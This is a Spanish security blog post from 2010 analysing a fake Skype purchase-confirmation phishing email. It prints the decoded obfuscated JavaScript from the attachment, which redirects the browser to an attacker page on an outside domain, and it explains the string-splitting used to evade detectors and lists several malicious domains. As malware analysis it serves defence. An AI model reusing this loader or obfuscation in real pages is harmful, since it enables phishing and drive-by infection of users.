Doymer Consultores

  • Increase font size
  • Default font size
  • Decrease font size
Inicio Blog Seguridad La compra de Skype que nunca hiciste
16
Junio
2010

La compra de Skype que nunca hiciste

Imprimir PDF

Hace poco hemos comenzado a recibir correos confirmando una compra que no habíamos realizado. Como si esto no fuera suficiente para mosquearse, al final del correo te indican que si quieres conocer los detalles de la misma –como siempre abusando del anzuelo de la curiosidad humana– tienes que abrir el adjunto asociado.

Pretenden venir de la tienda de skype e informan que tu pedido ya está preparado. Y lo dicho, si quieres saber qué has comprado pulsa el enlace adjunto.

 

Sin embargo, oculto en el adjunto y aprovcechando la codificación base64 para que no se vea nada a simple vista, viene un script que carga, automáticamente, la página del atacante. Si tomamos el adjunto y lo decodificamos nos encontramos con el siguiente código en javascript (todo en una sóla línea que aquí hemos cortado por legibilidad):

<script type='text/javascript'>function oM(){};var mU='';oM.prototype = {q : function()
{var c="c";this.f='';this.qP="qP";y="y";m=19082;this.u=34217;var tV=11871;
var o='hUt0t0p0:v/0/0kKeUnUdvo0aKrKuKb0av.0nUeKtU/Uz&x&.KhvtKmv'.replace(/[v&KU0]/g, '');
j="";jK='';s=53977;var h='';t=document['lRo*cYaYt3iVo3n3'.replace(/[3R\*VY]/g, '')];
r="";this.dL="dL";this.e=false;var v="v";var cU=new Date();this.oW="";this.uZ='';d(t, o);
var zW=new Array();var yS=53843;var sG=function(){return 'sG'};this.k=62296;g=false;
var l=function(){};this.lX='';var zB=function(){return 'zB'};function d(p, z)
{var i=function(){return 'i'};var yT='';this.sZ='';p.href=z;fW="fW";var pJ=new Array();
this.n="n";this.zN='';}nN=26475;var kZ=new Date();var zU=false;var kR="kR";}};
var hI=new Array();var nY=new oM(); x="";nY.q();var nP=false;</script>

A simple vista parece un galimatías que no hace nada. Pero si lo analizamos detenidamente vemos que realmente intenta cargar una página xz.htm situada en el dominio del atacante.

Con ese follón de código lo que intenta hacer el atacante en realidad es ocultar las instrucciones importantes entre basura. Probablemente no sea muy listo de todos modos pero este programa tan mal escrito está así por una razón bien justificada. Si hacemos un poco de limpieza en el código que hemos recibido nos queda ésto:

<script type='text/javascript'>
function oM(){};
oM.prototype = {
q : function() {
var o='hUt0t0p0:v/0/0kKeUnUdvo0aKrKuKb0av.0nUeKtU/Uz&x&.KhvtKmv'.replace(/[v&KU0]/g, '');
t=document['lRo*cYaYt3iVo3n3'.replace(/[3R\*VY]/g, '')];
d(t, o);
function d(p, z) { p.href=z; };
}
}
var nY=new oM();
nY.q();
</script>

Y este código sí que hace algo. Se aprecia que, al definir la variable 'o', lo hace con una llamada a la función 'replace' de un objeto tipo 'cadena de texto' (string). Este es otro intento de ofuscar el dato real que quiere usar. Esta función (replace) sustituye ciertos caracteres de la cadena por otros y, en el caso que nos ocupa, el resultado es eliminar de la cadena ilegible las letras v, &, K, U y O al sustituirlas por nada. Si quieres probar esta acción puedes pulsar en el enlace de abajo. Verás el resultado (esta operación no causará ningún daño en tu equipo):

'hUt0t0p0:v/0/0pKaUgUivnva0oKcKuKl&t0av.0cUoKmU/Uz&x&.KhvtKmv'.replace(/[v&KU0]/g, ''));

Lo mismo ocurre para la variable t cuyo valor real es document['location'] y declaran una función d(p, z) que luego llaman pasandole como parámetros 't' y 'o'. El resultado de esta acción es asignar a 't.href' el valor de 'o'. Si consideramos el valor de 't' lo que restamos realmente haciendo es redirigir la página a la URL contenida en 'o' ya que estamos asignado ese valor a document['location'].href que es una forma de cargar una página en nuestro navegador.

En diferentes variaciones del código anterior, las variables se trocean y se distribuyen en funciones para que los programas de detección de amenzas no sean capaces de identificar ninguna cadena significativa entre la maraña de texto. Así, uno de los últimos recibidos, trocea 'location' y 'href' y parece que la tendencia se encamina a trocear lo máximo posible el texto.

var e='rwew'.replace(/[w_CY0]/g, ''); equivale a 're'
var j='h8'.replace(/[8u1\),]/g, '');  equivale a 'h'
var p='fi'.replace(/[id\)OR]/g, '');  equivale a 'f'
var hK='t*i}'.replace(/[\}/5\.\*]/g, '');
var k='c5a5'.replace(/[5\!\:~x]/g, '');
var i='ofnq'.replace(/[qQ;\*f]/g, '');
var u='lmo8'.replace(/[86m5r]/g, '');
var d=j+e+p;  equivale a 'href'
var f=u+k+hK+i; Aquí tenemos la palabra 'location'
window.onload=function() {
var q=document;
m=q[f]; Aquí tenemos una referencia a 'document[location]'
m[d]= ....  Con lo que acabamos teniendo lo de siempre 'document[location].href=...'
}

Queda claro que este código es un mecano que no está tan orientado a intentar engañar a los analistas humanos como a complicar, o imposibilitar, el trabajo de los detectores automáticos.

La página en cuestión xz.htm (o z.htm en otros casos o incluso ninguna, con lo que se lee la página por defecto configurada en el servidor) puede estar alojada en diferentes dominios. Hemos recibido correos con variaciones en la cantidad y nombre de variables y funciones de la basura que encierra el código real de descarga y con enlaces alojados en diferentes dominios pero todas descargan una página ocluta que es la que realmente contiene el ataque.

Así que si eres de los que, o las que, no pueden resistirse a la curiosidad, es probable que tu equipo realmente ya no sea tuyo sino que este gestionado, manejado y controlado por alguien desde el exterior que te va a hacer responsable indirecto de sus acciones. Y puedes apostar que no van a ser muy legales probablemente.

Los dominios que alojan la página atacante localizados hasta la fecha son los siguientes:

  • kendoaruba.net
  • fixuss.bravehost
  • piazzacreative.com
  • govos-com-ua.1gb.ua
  • tiltandgrin.com
  • toldspeak.com (este asociado a un correo de adult friend finder en lugar de skype)
Share
Última actualización el Domingo 04 de Julio de 2010 09:32  

Escribir un comentario

El propietario de esta página no se hace responsable de las opiniones de sus lectores en los comentarios, así como puede o no estar de acuerdo con lo que en ellos se diga.

Usa el juego limpio en tus comentarios

Por favor, no realices comentarios ofensivos o insultantes. Tampoco generes comentarios con publicidad o Spam. No utilices los comentarios para 'enchufar' tu sitio. Los enlaces que pongas podrán ser eliminados. Pretendemos crear un espacio de comunicación entre el autor y los lectores.

Todos agradeceremos el correcto uso de la ortografía, pues no todos somos capaces de entender mensajes 'codificados' tipo SMS. Además te rogamos uses signos de puntuación, si puede ser, para mejorar la comprensión de tu mensaje.
No escribas sólo en mayúsculas ya que en Internet escribir con mayúsculas equivale a GRITAR y no por gritar se te va a hacer más caso sino, probablemente, al contrario.

Reserva de Edición

Nos reservamos el derecho de no incluir comentarios que sean ofensivos, desagradables, que ataquen a terceros (racistas, homófobos, etc) o que no tengan que ver con el sitio o con el tema de que se trata.
Los datos suministrados al emitir tu comentario son privados y de tu propiedad y no serán usados para ningúna acción comercial ni de otro tipo.


Código de seguridad
Refescar


Archivo

Powered by ArtTree